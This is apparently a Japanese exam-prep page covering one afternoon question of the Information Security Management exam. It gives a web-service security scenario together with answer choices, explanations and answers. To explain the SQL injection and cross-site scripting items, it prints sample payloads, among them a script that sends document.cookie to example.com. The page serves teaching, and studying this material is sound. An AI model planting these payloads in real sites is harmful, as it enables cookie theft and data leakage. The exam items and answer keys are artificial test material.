情報セキュリティマネジメント 午後問2

情報セキュリティマネジメント午後問2

問2　

WebサービスでのWebアプリケーションソフトウェア開発委託に関する次の記述を読んで，設問1～4に答えよ。

　P社は，従業員数1,200名の大学受験及び高校受験のための大手予備校である。先日開催した経営会議において，次年度から中学受験向けコースの事業部(以下，C事業部という)を新たに立ち上げることが決まり，現在，開講に向けた準備作業を進めている。C事業部は，教務部，営業部，総務部，マーケティング部の計4部で構成され，マーケティング部は，市場調査，広報活動，外部公開のWebサービスの企画，導入，運用などを担当している。

〔情報セキュリティ管理規程〕
　P社の情報セキュリティ管理規程では，次を規定している。

情報セキュリティ委員会は，最高情報セキュリティ責任者(CISO)と各事業部の事業部長，各部の部長によって構成される。
情報セキュリティ委員会は，P社の情報セキュリティに関する意思決定を行う。
上記の意思決定には，"暫定策を適用する際のリスク評価結果や残留リスクの承認"，"リスク評価結果などを踏まえた，新規事業又はサービスの開始の可否判断"などを含む。
各部には，情報セキュリティの推進者として情報セキュリティリーダーを配置する。

〔情報セキュリティの重点方針〕
　現在，P社のCISOは，情報セキュリティ活動を推進し情報を守ることと，情報を活用しビジネスを成長させることの両立が必要不可欠であると考えている。そこで，P社の情報セキュリティの重点方針として，"個人情報の漏えい防止"と"Webサービスの継続性確保"の2点を定めて，情報セキュリティ委員会のメンバーに通知している。

〔Webサービスの仕様〕
　C事業部のマーケティング部では，模擬試験の結果速報，成績推移などを，P社の中学受験向けコースに通う児童(以下，児童という)，及び児童の保護者(以下，保護者という)が閲覧できるように，ログイン機能を有したWebサービス(以下，Wサービスという)をWebアプリケーションソフトウェア(以下，Webアプリという)として開発し，提供することを検討している。マーケティング部のNさんは，Wサービスの企画を担当している。図1は，Nさんが作成したWサービスの仕様案である。

　マーケティング部の情報セキュリティリーダーであるS主任は，Nさんが作成したWサービスの仕様案を情報セキュリティの観点からレビューした。
　次は，S主任とNさんとの会話である。

S主任：: 模擬試験の結果などが児童本人及びその保護者以外に閲覧されるリスク(以下，閲覧リスクという)を減らすために，Wサービスはログイン機能を実装することになっていたね。
Nさん：: はい。児童でも覚えやすい数字4桁のパスワードを用いる仕様です。
S主任：: 料金の自動引落し明細メニューのログインについても教えてくれないか。
Nさん：: こちらは，保護者がアクセスします。児童が閲覧する必要はないことから，英数記号8文字以上の保護者用パスワードで追加ログインする仕様です。また，パスワードの入力間違いを減らすために，保護者がパスワード入力内容を表示に切り替えて，入力内容を確認することができます。
S主任：: よく分かった。この仕様案では，ブルートフォース攻撃のリスクが大きいね。また，児童の場合，自分専用のPCをもっているケースは少ないと思うよ。図書館，学校などの共用PCを利用することが多く，そこでログアウトを忘れることもあるので，閲覧リスクが大きいね。

　S主任は，レビュー後に，次の2点の変更，追加をNさんに指示した。

①ブルートフォース攻撃のリスクを低減するために認証機能の仕様を変更する。
②共用PCにおける閲覧リスクを低減するために機能を追加する。

〔委託仕様書の検討〕
　近年，Webアプリの脆弱性を悪用した攻撃が増えている。脆弱性の代表的な例としては，SQLインジェクションやクロスサイトスクリプティングが知られている。
　S主任は，Webアプリの開発を外部に委託するに当たり，情報システム部のU課長に相談し，委託仕様書はIPAが公開している"ウェブ健康診断仕様"を参考にすることにした。また，検収の際はセキュリティ専門会社のY社に脆弱性診断を依頼することにした。"ウェブ健康診断仕様"とは，元々は地方公共団体が運営するWebサイトの基本的な対策状況を診断するための仕様であり，低コストで診断できるように，必要かつ最小限の診断項目，検査パターンを採用している。したがって，Webアプリの一般的な脆弱性診断サービスと比較すると簡素な診断項目となっている。
　"ウェブ健康診断仕様"の診断項目を表1に示す。

　S主任は，表1を基に対処の必要な脆弱性を委託仕様書に列挙した。また，③情報セキュリティを向上させる上で有効かつ適切な他の事項についても，委託仕様書に盛り込み，情報システム部のレビューを受けてから，開発会社のZ社にWebアプリの開発を委託した。

〔脆弱性診断結果〕
　3か月後，S主任は，Z社が開発したWebアプリの検収に当たって，Y社に脆弱性診断を依頼した。Y社の脆弱性診断では，情報処理安全確保支援士が，"ウェブ健康診断仕様"に比べて診断項目が多い詳細な診断を実施する。
　Y社の診断での"危険度基準"を表2に，"総合判定基準"を表3に示す。

　Y社がWebアプリの脆弱性診断を行ったところ，c検出されたので，総合判定所見は，"要治療・精密検査(優先度:高)"であった。
　次は，診断報告会でのS主任とY社の診断担当T氏との会話である。

S主任：: 脆弱性診断で脆弱性が検出された場合，Webアプリを改修する以外の代替手段はあるのですか。
T氏：: WAFを導入することによって，パラメータ操作による攻撃などを防御することができます。ただし，認証やセッション管理の不備を悪用する攻撃の中には，防御できない攻撃もあるので，WAFは，Webアプリに対する攻撃によるリスクを低減するための対策と考えてください。
S主任：: なるほど，対策として不十分なので，Webアプリを改修するよりも残留リスクが大きくなるのですね。それでは，Webアプリを改修する場合であれば，WAFの導入は不要ですか。
T氏：: いいえ，そうとも限りません。Webアプリの改修が完了するまでの間，Webサービスを停止する代わリに，④WAFを暫定策として活用することも可能です。
S主任：: 分かりました。Webアプリの情報セキュリティ対策では他にも注意すべきことはありますか。
T氏：: Webアプリの脆弱性を突く攻撃とは別に，パスワードリスト攻撃のような利用者側の管理面の脆弱性を突く攻撃が，最近，増えています。

　S主任は，今回の脆弱性診断で検出された脆弱性については，Z社に対してWebアプリの改修を求めることにした。また，パスワードリスト攻撃については，⑤児童や保護者に対する注意喚起を行うために，児童にも分かりやすい情報セキュリティのしおりを作成し，配布することにした。
　Z社は，Webアプリを改修した上でP社に納品した。数日後，S主任は，Wサービス開始に向けて情報セキュリティ委員会に報告した。

〔Wサービス開始とその後〕
　情報セキュリティ委員会には，脆弱性診断結果と，その後のWebアプリの改修対応が報告され，Wサービス開始に向けて問題ないと判断された。情報セキュリティ委員会の終了後，S主任は，情報システム部に対して，Wサービス提供開始後に新たな脆弱性が発見される可能性，及び，⑥P社の情報セキュリティの重点方針を実現する上でWAF導入によって期待できるメリットを説明した。情報システム部は，WAFを導入することを決定し，その後，C事業部のWサービスは，予定どおりサービス提供を開始した。
　Wサービスの提供開始から数か月後，S主任は，Z社に対して，⑦パスワードリスト攻撃などによる不正ログインの発生状況に利用者側でも気付くための機能などの追加を依頼した。
　その結果，P社はWサービスをより安全に提供することができるようになった。

設問1

〔Webサービスの仕様〕について，(1)，(2)に答えよ。

(1) 本文中の下線①の仕様変更について，Wサービスの仕様案よりもリスクを低減できる変更内容を，解答群の中から二つ選べ。

解答群

児童用パスワード及び保護者用パスワードの入力内容を，常に非表示にするように変更する。
児童用パスワードを，数字4桁から英数記号8文字以上に変更する。
保護者用パスワードを，英数記号8文字以上から数字9桁に変更する。
ログイン失敗回数によるアカウントロックのしきい値を，5回から8回に変更する。
ログイン失敗時のアカウントロック時間を，1分間から60分間に変更する。

解答選択欄

解答

※順不同

解説

ブルートフォース攻撃は、パスワードクラックに用いられる手法の1つで、特定の文字数および文字種で設定可能なすべての組合せを試すことで不正ログインを試みる攻撃手法です。この攻撃への耐性を高める対策には、パスワードの文字数を長くしたり使用可能な文字種を多くしたりして設定可能なパスワードの組合せを増やすことや、連続したログイン失敗に対してアカウントのロックアウトを実施する方法などがあります。

問題文のWebサービスは、児童のパスワードが数字4桁、ロックアウトの時間がわずか1分なのでブルートフォース攻撃に対して非常に脆弱です。この仕様では、自動化されたプログラムによる攻撃であれば容易に突破されてしまうことでしょう。

誤り。ブルートフォース攻撃は入力されたパスワードを攻撃に利用するわけではないので、パスワードを非表示にしても効果はありません。
正しい。使用できるパスワードの組合せ数は、数字4桁のパスワードでは10⁴(=1万)種類ですが、英数字8桁のパスワードに変更すると36⁸(=約2.8兆)種類と大きく増加します。設定可能なパスワード数が増加するためブルートフォース攻撃の成功する確率は大幅に低下します。
誤り。使用できるパスワードの組合せ数は、英数字8桁のパスワードでは36⁸(=約2.8兆)種類ですが、数字9桁のパスワードにすると10⁹(=10億)種類に減少します。これによりブルートフォース攻撃への脆弱性が増します。
誤り。しきい値が5回から8回に増えると一度に連続して試行できる回数が増えるため、ブルートフォース攻撃への脆弱性が増します。
正しい。ロックアウトの時間を長くするほど時間当たりの攻撃試行回数を少なくできるため、ブルートフォース攻撃への耐性が増します。

したがって適切な組合せは「イ，オ」です。

(2) 本文中の下線②について，追加すべき機能はどれか。解答群のうち，最も適切なものを選べ。

解答群

アカウントロックを利用者が自ら解除できる機能の追加
定期的なパスワード変更を利用者に促すメッセージ機能の追加
パスワード強度をチェックする機能の追加
パスワードを忘れた際に使う利用者への"秘密の質問"機能の追加
マルウェア検知機能の追加
ログイン状態をタイムアウトさせる機能の追加

解答選択欄

解答

解説

②で求められている事項は「共用PCにおける閲覧リスク」への対策です。Webサービスの概要には、ログアウトに関しての以下の記述があります。

ログイン状態の自動継続は、便利である反面セキュリティ上のリスクを伴います。S主任の指摘にもあるように、児童が共用PCでのサービス利用後、ログアウトを忘れてしまった場合には次の利用者に秘密情報が閲覧されてしまうリスクがあります。

このリスクに対しては、ログイン時の最終操作から一定時間が経過すると自動的にログアウトする機能を設けることで、閲覧リスクを低減させることができます。

∴カ：ログイン状態をタイムアウトさせる機能の追加

設問2

〔委託仕様書の検討〕について，(1)～(3)に答えよ。

(1) 表1中のa1，a2に入れる字句はどれか。aに関する解答群のうち，最も適切なものを選べ。

a に関する解答群

解答選択欄

解答

a=ウ

解説

受動的攻撃と能動的攻撃の分類基準については表1「"ウェブ健康診断"の診断項目」の注記に説明されています。

受動的攻撃: 脆弱性を悪用する攻撃の成功には、攻撃者の用意した不正リンクをクリックするなどの被害者の操作が必要である。
能動的攻撃: 脆弱性を悪用する攻撃の成功には、被害者の操作なしに、攻撃者がWebアプリに対して攻撃するだけでよい。

a1とa2で空欄となっている、SQLインジェクションとクロスサイトスクリプティングについて簡単な例を交えて確認しておきます。

SQLインジェクション: アプリケーションの入力データとしてデータベースへの命令文を構成するデータを与え、Webアプリケーションが想定していないSQL文を意図的に実行させる攻撃。

例）以下のように利用者からの入力データを用いたSQL文を実行するWebアプリケーションがあるとする。
SELECT ID, メールアドレス FROM ユーザ
　　WHERE ID = 入力パラメータ
このSQL文は,
入力データのIDとそのメールアドレスの組みを取得することを想定したものだが、入力データとして「'' OR 1 = 1」という値を与えると、
SELECT ID, メールアドレス FROM ユーザ
　　WHERE ID = '' OR 1 = 1
というSQL文になり全ての行が取得されることになる。もし結果を画面にそのまま表示しているならば情報漏えいとなる。もしSQL文が指定行を削除するものならば全てのデータが消失してしまう。
クロスサイトスクリプティング: 動的にWebページを生成するアプリケーションに対して、セキュリティ上の不備を突いた悪意のあるスクリプトを混入させることで、攻撃者が仕込んだ操作を実行させたり、別のサイトを介してユーザのクッキーや個人情報を盗んだりする攻撃。

例）掲示板やクチコミサイト、HTMLメールなどのように、利用者の入力データを利用してコンテンツを生成するWebアプリケーションに対して、
<script>
location.href='http://example.com/?'+document.cookie;
</script>
<a href="#" onClick="location.href='http://example.com/?'+document.cookie;">
http://example.com</a>
などのリダイレクトや不正リンクを含む入力データを与える。Webアプリケーションがこれを無害化せずに出力してしまうと、ページにアクセスした利用者やリンクをクリックした利用者は、移動先のサイトに意図せずクッキー情報を送信してしまうことになる。攻撃者の任意のスクリプトが実行なので、上記の例に留まらず様々な被害が生じるおそれがある。

SQLインジェクションは、Webアプリケーションを介してデータベースに直接攻撃する行為なので利用者の操作を要しません。したがって能動的攻撃に区分されます。
クロスサイトスクリプティングは、被害者が、攻撃の仕掛けられたページへアクセスしたり、リンクをクリックしたりすることによって成立します。したがって受動的攻撃に区分されます。

したがって正しい組合せは「ウ」です。

∴a＝ウ
　a1＝能動的攻撃
　a2＝受動的攻撃

(2) 表1中のbに入れる字句を，解答群の中から選べ。

b に関する解答群

クローラへの耐性
セッション管理の不備
ディレクトリトラバーサル
ディレクトリリスティング
認可制御の不備，欠落

解答選択欄

解答

b=ア

解説

項番7bによって影響を受ける特性に注目すると、この攻撃で影響を受けるのは「可用性」だけになっています。裏を返せば、この攻撃は機密性や完全性への影響がないということになります。この点と各選択肢の事項で影響を受ける特性を比較していきます。

正しい。クローラはWebページに連続してアクセスし、ページのデータを収集するための自動プログラムです。クローラへの耐性が低いと応答時間が極端に長くなったり、最悪の場合、ウェブサーバが停止するといった不具合が発生します。この脆弱性は、機密性や完全性への影響はなく「可用性」だけが影響を受けます。
誤り。セッション管理に不備があると、セッションハイジャック等により利用者情報の漏えいやデータの改ざんなどの被害が生じる恐れがあります。つまり機密性と完全性に影響を与えます。
誤り。ディレクトリトラバーサルとは、利用者やクッキーからの入力をもとにファイルパスを構成するWebアプリケーションなどに対して、ファイルパスの検証不備を突く(例えば親ディレクトリを示す"../"を指定するなど)ことで非公開ファイルの不正取得を狙う攻撃です。つまり機密性に影響を与えます。
誤り。ディレクトリリスティングとは、URLに末尾のファイル名部分を削除したディレクトリパス(例えば"http://example.com/test/"など)を指定して、そのディレクトリの内容を閲覧しようとする行為です。ディレクトリ一覧へのアクセスがサーバで拒否されていないと非公開ファイルなどが不正取得される恐れがあります。つまり機密性に影響を与えます。
誤り。認可制御の不備とは、現在のユーザには実行権限のない操作が実行可能になっていたり、本来閲覧権限のない情報が閲覧可能になっていたりする不具合です。機密性と完全性に影響を与えます。

(3) 本文中の下線③について，次の(ⅰ)～(ⅴ)のうち，有効かつ適切な事項だけを全て挙げた組合せを，解答群の中から選べ。

開発を進めていくうちに，追加のセキュリティ対策が必要なものが発生した場合，委託元に提案すること
再委託先も含めたセキュアな開発体制を，委託元に説明すること
脆弱性観点からのセキュリティ試験結果を，委託元に成果物として納品すること
他社のセキュリティ開発案件で顧客から受領した委託仕様書を，委託元に開示すること
納品後のセキュリティに関するサポート方法と費用負担を，委託元に説明すること

解答群

(ⅰ)，(ⅱ)，(ⅲ)，(ⅳ)
(ⅰ)，(ⅱ)，(ⅲ)，(ⅳ)，(ⅴ)
(ⅰ)，(ⅱ)，(ⅲ)，(ⅴ)
(ⅰ)，(ⅱ)，(ⅳ)，(ⅴ)
(ⅰ)，(ⅱ)，(ⅴ)
(ⅰ)，(ⅲ)，(ⅳ)，(ⅴ)
(ⅰ)，(ⅳ)，(ⅴ)
(ⅱ)，(ⅲ)，(ⅳ)
(ⅱ)，(ⅲ)，(ⅳ)，(ⅴ)
(ⅲ)，(ⅳ)，(ⅴ)

解答選択欄

解答

解説

正しい。セキュリティを強化する機能の提案は、納品される製品の情報セキュリティを高めるのに有効です。
正しい。再委託をする場合は事前に委託元の同意を得ることを定め、再委託先のセキュリティ対策を明確にした上で契約を交わすことが望まれます。
正しい。検収時の検査として自らもセキュリティ検査を実施するとともに、納品物としてセキュリティ検査結果を添付してもらうと効果的です。
誤り。他社の委託仕様書は機密情報ですから、開示を要求するのは適切ではありません。
正しい。納品後のセキュリティが高まります。

したがって適切な組合せは「ウ」の「(ⅰ)，(ⅱ)，(ⅲ)，(ⅴ)」です。

設問3

〔脆弱性診断〕について，(1)～(3)に答えよ。

(1) 本文中のcに入れる字句はどれか。解答群のうち，最も適切なものを選べ。

c に関する解答群

"HTTPヘッダインジェクション"の脆弱性が，1件
"OSコマンドインジェクション"の脆弱性が，1件
"クロスサイトリクエストフォージェリ"の脆弱性が，1件
"クロスサイトリクエストフォージェリ"の脆弱性と"意図しないリダイレクト"の脆弱性が，それぞれ1件
攻撃が成功しても被害が軽微であると考えられる脆弱性が，3件
攻撃成功の可能性が低い脆弱性が，1件

解答選択欄

解答

c=イ

解説

Y社によるWebアプリの総合判定所見は「要治療・精密検査（優先度：高）」でした。表3「総合判定基準」を見ると、要治療と判定されるには「危険度が"高"」の脆弱性が検出された場合です。
さらに危険度の基準について表2を見ると、「危険度が"高"」は「能動的攻撃が成功する可能性が高く、機密性や完全性の被害に繋がりやすい脆弱性がある」場合に分類されます。

つまり、ある脆弱性が「危険度："高"」と評価されるためには以下の3つの条件全てを満たす必要があります。

能動的攻撃である
攻撃が成功する可能性が高い
機密性や完全性への影響がある

この条件と表1の各項目の評価をもとに、各選択肢が「危険度："高"」であるかどうかを判定していきます。

誤り。"HTTPヘッダインジェクション"は受動的攻撃なので危険度："高"の条件を満たしません。
正しい。"OSコマンドインジェクション"は能動的攻撃であり、表1の危険度の値も"高"になっているため「危険度：高」と評価される条件を満たします。
誤り。"クロスサイトリクエストフォージェリ"は受動的攻撃なので危険度："高"の条件を満たしません。
誤り。どちらの攻撃も受動的攻撃なので危険度："高"の条件を満たしません。
誤り。"攻撃が成功しても被害が軽微な脆弱性"の検出は危険度："低"に区分され、総合判定基準は「差し支えない」になるはずですので不適切です。
誤り。"攻撃の可能性が低い脆弱性"の検出は危険度："低"に区分され、総合判定基準は「差し支えない」になるはずですので不適切です。

∴c＝イ

(2) 本文中の下線④について，P社の情報セキュリティ管理規程と照らし合わせると，どのような対応が必要になるか。解答群のうち，最も適切なものを選べ。

解答群

C事業部の営業部による，Wサービスを停止させるかどうかという業務観点からの判断
WAF提供元による，リスク回避の観点からのWAF設定などの技術的なアドバイス
情報セキュリティ委員会による，リスク対応の観点からの承認
使いやすさや画面の見やすさの観点からの児童の意見の聴取
保護者による，個人の権利利益保護の観点からの同意

解答選択欄

解答

解説

下線④「WAFを暫定策として活用する」に関して、P社の情報セキュリティ管理規程では情報セキュリティ委員会が行う意思決定について以下のように規定しています。

「意思決定には、"暫定策を適用する際のリスク評価結果や残留リスクの承認"，"リスク評価結果などを踏まえた，新規事業またはサービスの開始の可否判断"などを含む」

つまり、WAFを導入するには情報セキュリティ委員会に諮問し承認を得る必要があります。

∴ウ：情報セキュリティ委員会による，リスク対応の観点からの承認

(3) 本文中の下線⑤について，注意喚起すべき内容はどれか。解答群のうち，最も適切なものを選べ。

解答群

他のWebサイトと同じ利用者IDとパスワードを使わないこと
パスワードを定期的に変更すること
パスワードを変更した直後に再変更はしないこと
パスワードを忘れた場合に備えて，周りの友達とパスワードを共用すること
パスワードを忘れないように，パスワードをメモして安全な場所に保管すること
利用できる全ての文字種を組み合わせ，可能な限り複雑なパスワードを設定すること

解答選択欄

解答

解説

パスワードリスト攻撃は、複数のサイトで同様のID・パスワードの組合せを使用している利用者が多いという傾向を悪用し、あるサイトに対する攻撃などによって得られたIDとパスワードのリストを用いて、別のサイトへの不正ログインを試みる攻撃です。

パスワードリスト攻撃では他サイトから盗んだ（有効な）パスワードを利用するので、パスワードがどれだけ複雑であろうとも関係ありません。またパスワードを定期的に変更していても、それが他のサイトと同じならばパスワードリスト攻撃に対して無力です。重要なのは複数のサイトでID・パスワードの使い回しをやめることです。

∴ア：他のWebサイトと同じ利用者IDとパスワードを使わないこと

設問4

〔Wサービスの開始とその後〕について，(1)，(2)に答えよ。

(1) 本文中の下線⑥のメリットはどれか。解答群のうち，最も適切なものを選べ。

解答群

Webアプリ改修期間中のサービス中断を回避することができる。
Webアプリの改修を一切不要にすることができる。
保護者などに対外的なアピールをすることができる。
マルウェアによる個人情報の漏えいを防止することができる。
レスポンスを向上させることができる。

解答選択欄

解答

解説

P社の情報セキュリティの重点方針とは、"個人情報の漏えい防止"と"Webサービスの継続性確保"の2点です。
S主任とT氏の会話中に「Webアプリの改修が完了するまでの間，Webサービスを停止する代わりに，WAFを暫定策として活用することも可能」とあり、WAFの導入によって、Webアプリの改修期間中もWebサービスの提供を継続できるようになることがわかります。このメリットがP社の重点方針である"Webサービスの継続性確保"に寄与します。

∴ア：Webアプリ改修期間中のサービス中断を回避することができる

(2) 本文中の下線⑦について，追加すべき機能はどれか。解答群のうち，最も適切なものを選べ。

解答群

2要素認証
休眠アカウントの無効化
推測可能なパスワードの設定禁止
特定のIPアドレスからの通信遮断
認証エラーに対するアカウントロック
パスワードの有効期間設定
パスワード履歴保存と現在と同じパスワードの再設定禁止
普段と異なるIPアドレスからの通信遮断
ログイン履歴の表示

解答選択欄

解答

解説

下線⑦は「不正ログインの発生を利用者側でも気付くための機能」です。選択肢では様々な対策が示されていますが、ほとんどがサービス提供側で完結してしまうため利用者側では気付くことはできません。唯一、"ログイン履歴の表示"だけが利用者側で不正ログインを発見できる仕組みです。

ログイン履歴の表示は、ログイン時や管理画面で前回のログイン時刻やログイン履歴、ログインに使用された端末・地域などを確認できる機能です。この機能の実装により、利用者自身が第三者の不正ログインに気付くことを期待できます。

∴ケ：ログイン履歴の表示